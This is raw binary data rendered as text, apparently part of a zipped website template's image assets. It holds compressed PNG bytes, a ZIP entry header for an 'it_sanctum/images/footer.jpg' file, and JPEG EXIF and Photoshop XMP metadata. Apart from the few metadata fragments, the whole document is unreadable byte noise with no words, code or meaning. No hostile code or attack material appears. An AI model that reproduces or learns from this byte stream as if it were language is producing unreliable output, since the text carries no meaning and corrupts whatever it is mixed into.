jt�ʅ���.m�/��D�r�I5�k*Y�&f3^a8����5��OV�瀅����ٟ��*�y[�V�1b�<ڧI�;cV#�k>�������k��^�\��-l�T}���
[��5ю�{����m|���ﱍ�	ʟnm�\�4v��k���{�s�?�'��3e��O�x�|��;[n�=��:����yw-=�Sp������w����ԃP���~�,��}�g�
�q�&X'���Dϝ����T�F��!�yŃ5x��6
��zv#�D�^똥��ۯ7�:�;_��W�/i��6[�N�h�e��lܕ��Af���f���q_��N�R�WέͻZ�&��P�h��PR]�"z<�<X��C�ӷ��$6�6��99�I�5	i���{�w��yT-1Q*7�DY��eN4�5XԘ�:��I�|��|-yh��}�,�e�l�Cz}�ר�?g������^��پ��4|����`��:Ѧ�7n-t?��t�9��9�
1�c�?C���\[�$�m|����ar`�eq��bo�6����l>6��˰pQ�^c|�Ǻ�ݻ[`�f�,��@�'6�[�3�J2�P�!�8<�f*���K6�-�d�
\���X�\�&�9�|�,xʦu��!���\��WNRFh���J�Ɩ��)�8[`"���Y9"��k�;[ǚ�wnj�Y������}��;�Oɯ�|eC��&"6��ƒ/zm%�cW+�pE�sw{�������R���u�l1�`YF�(Ν��H\t0A|�Y�W~�٢΃���~I�&�53�����Z���[�cᲉ��C����R��`�|���nT������Wܶ�JPe1�F/�Ȧ���뛶���K�:O��v�*]��]�u�K�ln����٪
(I�r�޼��.��"��0�C����M1���I�x/_"*��2YV���l�>S9YQ�=C�<��^�w�]�������q��%�;�x�l�/;Mֺ3%+N�z����5|Ӣ�T�\3n������HA�nl���ί-�KNm��c!��K�A����B��	�=�:Ng����H��P�M�e�j7,:����c�V�V�(�H#��w;+�'@(_,k3��M��Z�F��آ��_��2�:V���Z���)2Tj�W���5���4��c_�'�R�߂l���胔w�Z���ͤ�[��{ML��4mhkȄ�1�:wfw6��!lƩ��}9s\�����̣<������h/��_j��K�g6��z��"U�z����%c�� a�<x 8Y�ݫ �W�q�RU��軏��}�}��{�V
�aK~���~�P���(K�����x{�ʏ��9,/V�Cu�C���F[���v93Q����H��������2㝻g��=�R��T�V����m�s��
c(G�콨���:k�����S���b������k����`֯
�!�3[�r�j.;2�X�ʪ@,��+�k#w��(b��ڰ5!���%�ٜ�\T����m��<m\>c⯤�g3�=���lLg/='��^��_v��l�V����{W}EU��}�*�k���ƪ*5zNFd56�P�����������&��Mn�U��Q�����5F�u]���]�I��w\ô���:{q�yr��]S�X��jww/���?��>��Ͻ�����a)�]śe��_s�^�w�w/,�c����~���y]߲��(���:��5��<�.��3�Z�zD���3Cs��o�W�
��ec���i��:���/���������y*�Τ�~��c�V���ձ���jh/0��Dq�hNT����Z��μ��4���=�;c�D�]�zTq��g�CP󝯟����_��[?�s?��O��O����k_��6�X�X������m����2
�'���E䭁�	K�*g�e�j�);�ܨ6������u-�Xy�S�A��\���{m�X6��
tNd�n���([M�潳|ۀM�Y��{�RФ���������S�^�RӜKk~�_@{��C�8?����x+�����g2b{�F����2S
,o���S�-Ɏج]����]:�B��r��9��+�F	"�־�\@���26�^ɤS�v�y�ss��� �ۡ�9#�E٘�Q*�uM�����
dS�"Dߙ���)
�bso��'	m�Q X4$�M?�:g�xߓ�j���1�;K�e��h-D�-���}�X�����l��P�&+�+��0�5�WrGKcg�fV�׳�y#KAo�WwNW�QF�Η뜊��T����֚w6��&譿3��X@��YD���Je��/�����|��T�T	�
�3����Ҋ���6�۹�I0���x�\�'��;�52��${���`(�#ܯ�X��,c(?�s.�hNPv?9�d�]w��C�C���*�0-�龳�فef-#�yc���@4%�%%�|6��Y�Z*
;6™[&OS��{�r.C�&Il��$:=;2����������ũ$�k���Q� �|	G��^˟k��C%�2��e��#�W�[����lC1�����d���/�+ؠ��>^e������́b�g{{.5<l89ߴ5�$���(�r�k�n�~-#E������� Y�u�Z$�X��Į3@����Ub�3��b5�ۿ>�,KI9Js��\�X�lB�µj]O
bD���� Rիx�9�٩���f�����3����]���9/~�sv�Ƃn4�}��n^�d����U�g�tmJ����w.�%6�h�;GZ�� ��Rk{
�[�!=�b��=�s��K���5Su�&�u�Y9j�������*���\������d��#;�}�Lm0y���b��R�,�G���A6l>���X�|�8�b����z����W��w�i+�����:o�>b�w^�{��f�_��O~���d����}�{��5(���|	��y���*�X�О�L�����ʊd}�����
��M6���W+[��S�K���;T8�6Z,�l�g�ټj����֔���v�6�9��o��ԍ�o�^���e��}�D�9���]�����H�^�ݭ��`?�Z�6�{��&6���H^X����Km$�j�
om�δTl�bυ9Þ�+o�uU���)�w�)����#�ܟ�V��g�����R
Κ���9�g�W.�:L��y��u�x����vԆ3Y�/�p��#�d��u_�j�{�^I�Ż����'���7�*H>���Z��ڻ��}�5ŮWuL�k~IҸ�BM�#��5\l�xEG+9������}�ҿ�h�������f�_��_����_��k�r�]����}n
�L)f�li����~���`�i�V�2?�5�� KIBΦV��9������c��pv����忩H�SvF�u��F(hO�k.�^�{�/�/D�W�3�
�"��w���u�]���5����9l����G&�?�n��u����Y��_��_{�p��E%�m�|�<�X7Q�,�(6�%�0���I�����A��bw_)f�b&(��Q@JZ�Y�p��&���SC\�hS��haga���HG�\��+����L�I�,���Ϣ�;$5���ۼg4���A���U,�-Ҟ�8pם�*P�ߝ��k9guF?WRTF��^��!�h�7��y%2�9Z��bD�r�����(' ��A�p�l�xQ~��e�dY5h�hL9����q&w�����Ë���{m�vJh*)�lAR=~Q��"M+8WdT��Y5��(ƊJ���2.��^�o�/��r-e,Z�p��G�K'i���,��[���g�@k�>+8�(�g�=�Ym�p>��lv_�lC�K�,�M��h�9�”6`�НJ.f�c]0�|�@�.�c�%�)2vw�Wc)���� T2��<͢M���F�r�E�K'�9[���b`qQ���]`X{BI��ӂv���:���ڔȵ�b�$q�S���W,vTp�v��,�]����`�f��q��Cr�W�ҝ�W��|�3y�K%~���b���5��|���JE�ةQkrS������+C��������h6XI��S3����z�#l>	r��,�3lLDd�Uh�)(� �k�'�"|��2I�;ʳfaJ�O1�}W��F`�ɶ)�$S�Y���D��t�l{�V�YПE���o�|2*��hgC~���b�C�0}Bg�X�ϱ��sc�*!m�+�jO��u������|��vg.C͙�ż�i��u�g�Y@�2�������ۂ����X�^_l�J��|���ʴ�q&�q����y�;����8���n�֌5g�>����s͕�"C�'������I�8Sv�w�EIĕ���y.�^�Yf+�[�yc�= UJ^�ĵeF��3(c}��2��(o
x�1��`�؆�#�*��it]6ͼ�=;�=�[�v�2������YH�x�Q-�r�|�W�m{J�����\��yNQ����ǵ����G�3��Wl�w�����>�dস�ݺ��s�y��G^}
����ȕ?ٵ=^�=����5Z��)H�&�����7����wm����� �����a�6o�L�xf��Ƌ�.�m<��� F���5Nm�W:O�`��u6mT�H���������]7UyvԊ�/}��U�4�y6�@;����]��<a��ٕ6~� �}�˔W�_�b�ggU��*��N[`��ڙ䫬���glc߫=]`�׺Ly}�2��W��^�β�k�d�Q���b@cp�~�!1TGRFPhL@��9���UKs��]��L��r�8u��SZ����&^��-eS��9:?Y�^3��>�}u�������!%�~��_��_ya@����=����^���u^�xnZ��9�ժ���ы��|���E�Z��}�IQ�w~��_}Y�{�ꧩ�����E�?+�v�M���{��̓Z˻�b����6p$�-�Y�!eRIս;'浫P}U�fU�HU������zݷj&��Ak�� �y�FR��hl|@����c=������y��>o=�����v���{���s���}�8��)^�|�m�{��ei����|�sSK2��՜����9E%6Jl��]π9�09\���X��B/"c�(�܀��*�e�kN� ��^r��a�jPƾ�I�g��m�8KseqrF]�beDjl�Ɉ�g�wlXuIM���dI�
���9wX���a��eE�|�S�=��sBW��P�n��;`�Q���P��U��F�L�-ԉ��8����b�6+\[��{sE"�0*BT�P�ع�Beؙ
yҽ$o!��X�{
f�52j-��&;I��u�3�Zh��sz�sFi�gCu�Q�~���\�
`m��n�L))-�'G,���ֹ��m6T�J򼽓4xHo�k���ճvqE��̽�G%�;�wU6����3d�W�X�pԢ�e�z�,X�,�G��uQX(i/*���ΔwVz��Ɣ���Oƈ�1&}�&�}��l�C��y�+���"mm2)]�����V�͸�=+�Ơ���Ί�E=���\��*�k��}O���T��CΉ�-J	�*�1H�-V���.���%�ZPXɓ��D�yU�Ź�鞷�}w�N�/1�t�SC�:]�YS8/�����q��T��7%�g�J��v�L�bdǭD��y6!d^��k�j��/6�e�/�6��R-@@�r��e�gׇ�
��=kT���6�=�,�(e�g�D��5-#����3�VN2_es�8<#`R�kv�kۆ�l̝!(�S0E�a�a���\���l�#�+�Y�w�����-��v����Z�R�X�Y��R�7I�ɪ$�=S�٬����tp�ڦܠ*�c΁�� ����6]ʩZ���^��{W��Ϊ�m�G��t*jTO��q�v~z�%��[����jS�E ˄S�S�{kb^��v�3�Y���->[8���[Vy�X�������4�Mm�XAv��������s�7/L���M���d����f�le�v��tUA+y�
[kW��}���vFn��8K�=^�ѧ>���
w3{o�5�~�-��W��w��U���c�Lx��nF�'{���g�'�K_e\�L�K�-���پ���XF���Z�6����/x�|�����	�";d�ǜǦ�g܆~ŷ�g�_"�㸶eC��T�6ض���~�5&��9�2Ce,;6�|W@?3�7o���s]�Y�	�������Mj���[f����vƨ���?,hng#�|����wkH���1ǩ�W^_	�gl��s^���I��UԖ+�T�{�{֜^�e�/[X ��f��oZ{��K��<b_��6��0ʴ��ݗ��g��H.G��c��i�lS�Z<��7�R�~�j�M���~��{R�D�5��7��������5®�|�����]�� �E�9�����c����K>���U���y���_�:��p�9�����z��S2Xf��b�ǫ�f������������Dƻ������{u��f\d=W`�y�y�9�����j�;[oǹm|a>$�igu/��zZM�U��<P�5�o��Twj���5|����o���gV���wV�����җ���V:t%
kt������a�@��f ��[�����z��P4x܆r�E��Ϯ�&�SJ୅���m�f0�Ce/r��+�h�z��<��:��.w�=�������Y���6CFU���48�AY:d���3�͡r�g�O�,��6��9���F%%�h��}�?c]����(��3���	гetEtg�Y$�Rr�g*�Wb���0�t-^�}2"L�d�W8_i��O�h߽�b���\k�����g�Q�c��R���a��q��I���"c��~����9�싨���l��ޫd�u!�2H�r���[��7�kf\�����]A��Vz˲Ϯ��+��k��tr�ٴ{mk����9��ڹmHA\Q�0�&:[R@�3du�=��gѐ�	��9�.�DRV�3�V����ؗ5wj�Jꙷ��Wzʤ;{R�!*Sz�1;�yy��7�E�P�D/;�[�g��v����X3�a2�جS��n���PɆɡ��֭B@�5g�<���#)�_��"��˽�&`��8%�ŸlX���Ь9u���m~t���.g#+v�.h=-�7K(����&��u��ʄ�%��i�lJ��?�(.�ל]��pv#VQ�TE뻯�c�`l�ۢ��bG*X�z�$]�5�|�1���w.Ys�x�1��~��ʕ��V�F�X�6�d��-ĭl�H�������'��oUL߱2�nƙX�5;�X��e�)a�}�f�{oɪyL��^6�lY�
D�zi�-H�,"�Uv7�K��d�wv��7/V���b��Q �R�fG�x�6�d��{,�$_	M�*R��c�L;h�;�c>�)l�gG���;���ט�U�s<L�(j>��0��ٜ�>&?����/l�ٸͯ	�輬6_��3���jk��O��w?]���[)8c����#�-˾�v�9a��3a���ٛ�(�~ʥ.+�<�ٸ�U󹪡8
�|�3�J`6��+�=Ab�.�\�s�:�3�l�
��6e�}.6�-6���u��S�#�B�:�#��ڔ�+7g\�R�JV�7���>��b�w����\_��w��Z�}�������#������}�X��O}�lδ Cewؼ[���E�6k9�ǝK� '㮽M:Y~�7�<�wB�d IA���T�����n�i�j�u��^��kW�`���X�;����[sc���=��@b���]�n^�@��Î-�];%�d�D��K�l���mOw}��5(��;�X�3�r��Me�>w��e�n-��ځ�k�k�)��k���l��/�m�j�	�f j�����-N,q'a�XgG���Vͤ�^#�(�g�}�Kg��Y/��XLY���OE^<����qX*�Z�z�{��f�V�W5�;	�r�웋�K��Ko��?���8��������.���n��׿������5y��O��e
~�~�cJU���3״��_���5>I������q
@��ի$@��iܦž�����`l8��^����_��__^{k�Rj�P�u��{�w��X����[��߂P�[wk��=�����J�K�q�h�����U�QUwɑ6�W�C[}�t�����{��[׻�/\c���	���z��n��r��l�j5�Y����o��L�
<�cpXw���
�5��*B�HJ�����O��"Lt�U
�wւ�~g�(5܁�!.����F0��`wQ�"�3xn~�N��5
e͉T��;�p%5E췞]G�h�#:v�Ղ��3�w�c�(#\��}��~��7�5^A��.X�fTu�`23b�S�������;pIP�|��O��g���S����� �;�g(�s����*ڪω��as
,*���C6x;[�T�Y��\��P:�e������h#���z�\Y}OA�������<d6/:/���ubEِ`d�(�W������+w~yL���u����j&tI�^ SAOt`�����xg��3DU����c�TTĺ��a1�>�����|DjU����Ϧe��w�Y���Y�nX�tn�Y�p���]6=�_A��"�x���lq����l�L�Mn�w�t&a�G{�m}��Jkk��bR�z����LI����!�Yt_�R����
�隽�'�8
��<�]��'C�بuq֣,�-2e��w�:kI�xs�/!C�X����<�����{?O޿�k�J��5ƙ1!��5��9�y�k��^���@\�j�/��G��v�8ȡ�1%��S<��_1�@#�Ƒ(lJ�E���҅�f�ϑ%��g��A�ʄ
�|�M5�B]c����yܸO]G�]�[ǝ��s���/�Mg��1�^�1{ɒ�3;W�f�`J�*u}Ε�Z����f�U`�m�*)(ɸ�;2F���EI�>/[���eW	��*I)QƷl���b<�G �<��c�5-�QY���#X(oOs���? �)j�[)��|�`�{oq��x�VP��.N���s��X�-twN-�)�ٵ�#Hv���l�b�֥�.#F����~'I�J�Aq�i�ꬍtbaə��P�J���v�؂�K��X��c���w�dg�<rN��Y��7f[m�ۼ3�)�Q��Y�[��ƲM��HV�3��
ѽ�s�QˬY���H&�{ڜ�b��>��J�
����u�~|߇�u<	�O���o?��G�8���̞��o�k߹��g?���w�<^�����վ��~�5������X��Ɛ�8�%J6
�n����Z���+7��[�s6cgԽm����lo��6C�*�<-�+m��M��r��;��#�6��ې��j�L6x���n-�$���!��{_g�n��M� ��*>
^�gy֖$ ��ڪ�U�[��3�����u��ͫ
�����L�y�<���nC|�˄����M�k] �`Ygi�H���ޛ2�Ϛ�K��Ɣߣlw1���RN��|g5V��%e�JE>�8V��2�� w�tǃ�p��fÕ^Wɺ���͟T��/7���3�Z�}������nݮqv}�{��g�g~�u<pʹ�w�f�� ѨЮ�j5׀���͗�]�}����ݱ0��q��/��o}�K_z������o��o��Z�7���4��60��g+�i�/Uq˝��S*6^C���0�u��S�����=w�Q�������"F�ߚݚT�j/�.�8�r>��g�	�I��Wo?���y�)�����!y�\c���#ZW}�yg�|o��߯�A�^w��kw^o���n������}�7x9�<������k_{?�#@�������-P��Θ�W(�P�JT_7�����(�+a�<�tm�,!5Q�+��Õ�䜴٢HFՆ�kѦ��YSoh�ɢ`JZ�ٿ�� ���t��Ubw��;dat�J�<�Wb����+D'�(�X�@n]��[ƠB�l�}��l����U�Č�,)��Ir�J�k������Bp��"�YHӀY�0��@��g2��d��P�Y�5�����-��Pm�f{&#^a�Y�J4M�[����c#���Wg�>�ț<�l���T�3t��Nl��-6ٓ��y�1�*z�lj"��P]c�yc5��)!dd�uO��3�=g�K����"��y���F�2�&ʧ[�wtf��!�:g��x��5�ƯDZ
�|{��rm�D�Z@�b�m���7FL6�$Zd���>�@�9�"p��l�t��}N�-I�\vV���}�}�[P���"��Cr�r�2
�eQm�G�Ω����=\Q�u�n�?j�t�/��3�����-��SD��r���b&�)</%r%dJ�eW��$5o�dž��1��n/�\(k*P��GL�P���_�*�|	B{�f���h�lk��>��4�Q�6�z}�QDf�uM��Y1gEM�*V�Ԋa����e�Z"�eN���ye���Ǣ�� 퉀��·��l�㬴�
�-��2b��O����5��,m���O}��Si�=76Iv�����X���/߯����_ ��J�z?�U"�y�j�1lV�!��+�6�Jz���+�f�Q	|�;�آ�	���iΖ��e��T
y�ݭ�g�g��w��+����qG3�3�u��x���}
���?d��97�e3ug�Z��S\]A޳% ϑw�ś�G����sy����׺�f���x�QQ��dذ��(#���:��Z�6
�-���٬��3)J3Ń����t
*�V&����۷z��!�i����W>$N	�|�)dЫ��zX�r�W,��b�Mace�d�{&�m5O[�Ă���Wv&}����xz���JY�����k��w����������w�f�{�����|�}�?����~a���G�<�{�2;7���S�o�n!u��<��gJ�n,��9>k����bSG�BAϽ�S[g��(��c;O�X}A6����Dj
�7���	���G�,��2�36�J����>�?���{o�=����=�^�
�3�W	j�_�B���>g��˦�&l�������}>�ṯd���o��F�>��;���Ѻ*�s�Us`������6h�[P�JQ�5,�{�a�G�-Un���w巌O����5α�
���Q����1*�$/�A�u����+�k�[�]�YWC,'+gVm0�`3������e�z5�䠯�l����)��8��^9��}�5O�	|u�?��?a�ְ��^��j+W����L����Z�W�垮]n�`�j�W�&؞,*�̘L[г��4�xq�p
����}i�{U�R�G��b������<��]���|e��Qٸ�%��ǒ��Rˋ���	<�~�-9�C[�xIGw�5Ǟ�����5�����;3_��W^����Y�^����ۿ�쓻�#.�gU������VI��C�+r8�&4E7S�,:�Þ�bM���U���-��(��C��[t� �@P2�dQ����-����%<fw9_`����
�*Z�"�A}���3/o��I�q���}�2�=��/�e)e�J�d^Y����.�n��j��˚�?��se�,{M�x�5�e�B�}or�&9#v>�S�uLfgB�4�VP���6��{cö72�i�߿+��<��aD�l����}gE��앏P��B����A�ɖ�X�1Q��L.�����@�Y�0Q��FLAW���L&I"itT�lX�ؚ 5q;�ݧ{ W���S2�!��(���R��l/�T1�. v�����f�<f_cvnBLg��w��n�d�Z�k��sk�ט�E���!���2Wz���bCv����h���q5(I.���	�5[���$�`e�d9/1ۓ=��{����G;��W}��|)��"F�����������;�M�Mv�s�>�/:�hgo�,=�6W,$�P���O��q�,jj�ݳC��2,t�d����>�s�#�7�sM�������'���=e�d����*+����7�/�Q���~�^��j������g��Ά���*��<_~ϦX��	��Ȧ�(���go�ʱ�#c����4���ϒM*�Q�[5��qkϾ5Ę���������o:G�����rvA[�}�S��,��b���4��J(�,�Yb��ұ�GQ�l��y[x�|@�b��&��{���'L����|��!%2W��[��֯��\���#alĺO�&���_iu��٧�&6�d�� ��8��'���TV�Q/�a�ح�ic��3�qo����Jv����5�_2v;'6
d�fC�g%A-�8�WE��fq�@S%�W���CM�]�e�<�Qo��.&i�����e�5����j�̼Xe����_�
k��XBy�΄0�;?�f�\���c.NX��bW�����L�w;={��]�+��n����V�]�nS�uWf��Z��Zd�v��@���v��I�=�����ʾ����=����;��I@_���3�6�_�}��;G�}�g<>�#���L~��;����(����9���B�M�c<�m��h�k���U,X~�b��N�#"p޺S5���=�y�vZb�
��n�'� ϒk�L��'*��R���n��@���ֹl�>c��LJUl��d�X`�3�g�Ƶ���|N���c���;&D֗6�g���.�S�[3����,6��.�p�����Q����l\.�Wc�����m�l�y��,l�M
cڴ���٠�Z~FtY��B���w�X��9�bG�X1���O���,�RD@����&;=�M��o�0̵���j���Oj�yz�/��˗�v~�\��\Ƽ8;Z�n\�h��y���M���>|
�k�Xvw��Ք�F��s?���}��]J���л��V|������������h���:o~ǘ��h�oyv#�~S�y‚u�y.��If���%S5?٘׸���v���r�������e�nA��o9�S n��D�,v8��}F �s���v�hF��3�%��{n/�vy��R�>��o��_���'��E�j̥�"���y<��K�-.g�D�v�.�=gC;7_�n&6��m��V��a��U��P�&�,�]���U�osM�HV�ϋwF�����,�6��S��XɆ�kO>Q����
Č\�����jlUH�(X��=#�4�j����=��T�lvϢ�[��Rb%9%���ʶ�������s�⹲w�j�*��5��wƺbQ{��g($�+lx�=�~o�`r~�!�b���P��="RF���H�@�rP�ayY�U��fPEӊG6��m�l��ʚ"A�,i4�5V���{��^{���V��,̳QI�,{��F{���2�����W��c5J����-K�$D9�����j�a&���q���Quk{�Rè��O��F
��ĭ�9�W�ʬ���[��
.Q�=o�ۀv��M�
�ʊ�;�Q�œ��&��l�ޮ!�j~K`Dv�"��9�@n����9c�?qQi/V�=�}��)���L��ٸ���V
(1�-��gN�%���z�~�M��St����
���06`��4.��W�N�ъ�I#e�b9]32	����v��5:�s�:��1:3�s�7�}���O�>�wuh����3���7��I��B�ݛs
{����!�hx�*4�7[��j�5��}L>�3���[��@�b���J��>���J����Mj3���+R�����\��=� ���_{I������S�X�yߧ�3��1m�GfT1F�ie�b:o+"尕Sv�"N#,�,k�g�l�gߛs���$H3Iw�{6��Ixz�
������s�1U}*^m�b?�M~����,^�\�0s��g��V���"�\��>�f�S����Tb^�f%&;W� �YE���(跸�:�-CC Q�o1����6�H���>+�O�I�?�Ya6D<�<�]��z�EV� �	�g*�-�`��3f�6y����~��Xu�z'Jy~R���Y�N��o�sԺ�_j�b��m�4����Yݙ_�}�H������]9;;�P�[1z��X�Zן�I%.;�0.�鹱	Q��V����$*p�гr�~���xE���Ҿ���ٳ�s{�S���>������?�X�>���2�P퇓�>���z�������5��
{,��[�� ��Ɗ �7I�뷝����g��~�f�M*�3ۘ&��Y��iYK��@��O�-��g!��n< 0��������m@
�}�.f-N_�ln�6�XɘԜLyeG�؄\���F��q�D��a���jZ6���hUMvf�~��C�U��8�o��͕W�q��Jc�������*ᛤ���]���0�d�־�֝]��+_���8�ڠ*�e���.[|��ݾɮ�5{ks�����U^�H�r�**6����/y�s�=�6��dg��]��j	���T�o�k�=�+�����]�qu��)n���L��a����Cz������[��´�ַ��W\]�&\5�X��w��y�{��?��?}]�?�l*j�]IT_���3�0�,x�u�ؿ{��y`^ƻ�-J��&�/�9��E�����_���Wv/0�@z�V<)�^����{v��*�U�Iҡ����1Up�l�Iy[5ϝ��b��Ǯ�gZ
-�|�՟�'��no�ٟ��K�wA�ن��k��<tc���/|��IR��+��,��6�H��*~Q�:�^��;d�BY���=����X����VDgߵ(�`I��
ۊ�W�m��uz���Jt�I�!��ba�06Sn���58kB�P8s@�1em�{��F��r
�3�:��_4d��Z����̈�&I�d��f �h3P�@��:��M�֤g۳�u�{N�����,m0w���?�Y�l���C��r�IU��ωZп"�ﮡ&��Q6�(+�q�ᶇc�n�Y1�.P2��.��(`��JQ�hNA(�D�l�n1J6U��@�#Q�ʡ��T���w��A6٫��p>�M����I-"h�w�^��v�hRlQ7)��W�
�!]���]��������ARSm�!ʠ���U�P�!Aw��;��L����"Pf��-"�8��
\ٝ�e��R�&#=gg����nU^ԩ�a�n�[�Q#���٘���4e�t�&Нy	�]s�>��Uܱɦj� 5ٜ��}Ҝ�g��|_�2�{�D�����.����_
�W������嚊B`�
i*tT �$��v�@鳜q��%Y���b��6�m�9���2!M���͞��p�uv�&�a�ﴫ����_G;����9��d�U�L�*����a��Yخ���||�rg��@�,�쑍����S1h,^����+;(cb%�z����:�%S&}J�*��Y�z�-8:�X�5��(2Y��9����ʵiK�)�gx��+�N&F&�T�dmj����[���iqK�R��
"��[7A�*�t.T����ZX@���eB
c�c�Ό(qg�����emë�3����fkw�mto�l�W��y�+J	��?Udq����κy��6�́T:�R�S�R�I�[��J�����@�ձ��#X�g��z�)�#����8��C�d���%�J{е�(��߳t$�ʓ��R�Y��sx����=�9�ӼK ����Ǯ��1���Ŏ���w���){R�U��R��M���u�%/�a�ޛ�	�* +�1Mޗ�cg���L@s��Z�w��k?�{�q���5�?��,:AI�����o?⦏n�I@w����{����j_��������`lc�g��;N��$D_�s�?�ݮ���l@�YF�v���6����)]�����=�F����X'P^V�lӨ,`����+�l�(�F&�,*	][k�{U�{&s�<R�g�d��t�9�H[�q���0�v�}6���@S�YƲ�_vL���g
���M�������/�Ħ�׵��7�H�i��ʔ?���m[)�^�{k/˶���g�aC��rm�
�mt�|�X�9�g�|���<?��j��-���.X2r�q��+k1P`q�9������9zW�Hř�*�kq�j�����3c@�wUc�{h��5��O
�5��W���]�H_���v=I�ۿ}��X̼���T��kWGu2���k�z\���o~�y|D�[�˭��Ȓ��d��5F^�V�'ᲿWG�z��z��K�����Qף�)|�?�o����I�6��[�[�lc6^��ǵ	�V�|��!���zFW����z�#��Q[��f(��{�Rnj�#ɫ=%���],�u���Z�-^�zR�?:��;[����W20���vF��4v�̔��6��MSQ�B~��`���wɐ��;o�FqE�h�[�T�4&GM����v��"�jȈl�T���bn��� �D�eE����Ko#�f�CE�3T������^��m2�d���P�\Q���3�WN�f���]�r��[H�$�c�(����{��7�[�[�f^ɬ������IZ�[�X�;������*w J�=�C�a�=��ڛ5�d%�!r1CZp଒f*Z�2��l�k����<���10�|v��bu��^�E�hM�
JAhe�Z���+oT���qF]����s�}n��~n�'VFl��Dw�5�ZI����R�����;���7��(�ܙ���B�q�3����p��>�u����Y��^):%�ab!t9J�	�P���nCJ&�%-dt6��]W��}^��k,�;_�٦��i{<1D�*a��wȮ�B�Ry�Aޏ�Mמ}�.��X���^��(�P�Ʉ��]ɹ@d�˪֎	�9t�D��Z6V���<�+CC���q翶_Je��D�w4�����d�/�o���"'�|�N�_F��T{���Z�����A�5�-h��m��"#����+1��Ww/��a��������g�d��/g��8��_�Y�����2{d�{ט�������Z�˰�a�h����2:@b׬�u�GYvC&��A�\��j��IJ�*[Ăų1�Ɣ|[�g��� CR�Ů�a�c6m���]m�P���r�A�~�syE`+륿�8�oQ�{%�5>���i�E���e�K��+=瘏]���UFԥڈ��U�2�+^�abS��)]�3��c{�2�Z�,�s��3���g�@�|+��M�K~V�b�H>O�v9G�c�O+c��Q
eR6,�X�uc{�\�<]����=kE�IUC��mN%(P��*'��ƞ�em��4�Uִ�QY�&l�Q��U�P
��r�7�^�#=�9���Ql��U�+gwN�!����a���e��H�m�-���$�]��e�V�x��=^���}�3z���w���g>����-��ŏg��z?�ɟ����w󅯩|?����
�����@>�Yz�h���ael�Q6���6��	��|c[��2e������X��1����7�q+�kn����L����a��wU#(&pȵ���m^9�X0��{�Y;�Z�Z=�k�r6:������4~��Ҿ���\(�O)�r.���e𪆲�64�~�#��7��6�l��y���{o��+)b�e���5�j�q���n��֞���3�\�2���ϔb�$?�}X<�3��e�S��z���w~�5�*mޯJvَ!�Y���`cӾ�f��$A���w'�|1y�\=�k��k��w��8��Ch�ZDʅGP���^[����5H��.��&g��{���ꚯ3^�f����_�����O��2���
��8���xV��ƣJ���d��>�w���������{��|�r���C�^��m0V�Q)7�m����ߘ_���Z��3Q�F�ׂ�lXK�f}&����N���x}�dRϾ���c���w��F3�O�3��{��{�_���_����rb��/9�W��E��Ī�"��'��$[X�^|�6���[�FR���A�e/�JrX�%s6DDIL�<g�	��5ѕ!�!\�$�|+1��=�&�)ȼ{9�M<�n��c��n�&{�;�I�b��(�\��O)e�Z���}���m�k�&C*|b,D�M,ƕ#R容�Wh5Q�o�����\+�T���'���2Q;]���ˊU�r
�{Uy�WI��"�3M>By�PZO)e�>�Y�ʍ����l��+��\���8�	�s�Jwɺ�!e/�m�
�;�k%�T18gx?K6�~~�3�SE\Y�=���h�YE��Bͮ{�,�l�,��n��L�Ά��["K�b�(��߳���?����g�C��%g{?�����~�u4r�"OM'�s�V�5y���ɊSʵ}&C�=�s�'���E��Il�:'J�r����9�9��ea�`�l���mq�6NY[��2�Mh�^#L�D#��!�O��?7���.ֆ�Mj}���3�-tȶ�.:Z�^�;	!Q�����t)����*,�IM�sݞ��\\�č�Q~�y��3��ޕ������f9oZvgߧe����-��\%�j�"���݂�}�ٛC���u���x&[RS�g�=���{.�g�kL8�Cg�"wg-�l��~�8��m�9_S�#ۨo�n�3��eC6 8��J�^�H����u�y^�{]w�	�*�W{X<��E0���w��r�ʢ:��4l�~'�-��rP�,�xFd9fCddg����E��Q:��x�9�[�s�l���>+`Z`�kùg!3_@��[�o�ݸze7��'��}T̩Y>�B�����6�̉����;��fe����;��j��١�M�rņr��I��lC�b����ʃ�˸�6>�hHe=@֫@Q��ƃ�җ�9;�<:�>2����mχ{��L���^�����h���� �=w� �ނv,V{���ަ�@��5se�M!�Σr�2�=��._&� B����rL�la�ޮ˳�ăm��/4�]��@�`��.�u������3�G����x�>�������u?�����������#G���˫�_���~���7WXY`�$�]|ƈ7�����v�d�/;gǻ�0!+P`~>K0�����([Ma��K��y�M�m�=+l����X���x��4^�6˙�g��obpZ�Z&��ߕ%vf��q-�$o���`
hY��2}�2beG;6p�V��*��LTmR!º�/��y��P��{P�r�JJk�s]��T����7�Y_��9��m"���h������v~�{{�{�oz�߫���l�׹������Ť�%�N���ٺ��F22/ɮE$
4]�VS�X���Yh�r���z)�\?!t�����@���l��*��uƺ��I�m��{�y2�Ɩ����[\8�V�t׿�zE������1j�}����|Ύ�	�m�T\WO�xW$�|����G����}^3��*������5��1fWǍ��s26Si!Ғ�0<+փթ�֞X[�7I:�n�L�����'�x�^��{W>[�g�}��~�M�V���'���D6��sq����9Y������/����c9ԲX�IEND�B`�PK!�>������it_sanctum/images/footer.jpgnu&1i����ExifII*��DuckyP��+http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:76A225137EFE11E6A906D29D15A1492E" xmpMM:DocumentID="xmp.did:76A225147EFE11E6A906D29D15A1492E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:76A225117EFE11E6A906D29D15A1492E" stRef:documentID="xmp.did:76A225127EFE11E6A906D29D15A1492E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		

				
	
������z	!1AQaq��������"2BR#3brS4C$�����?���/��o���)�@m T��|3���I�-`� ��@��: 4��@�>@�_`K@0Tq8��
p�:�����������>����
�x����m���=�����8� d�
��� b�n\@P�8G	ڼ@ n��m�o�PW��
�v�m�)�p�
�=���m@���6��[[@P��6��@Q��
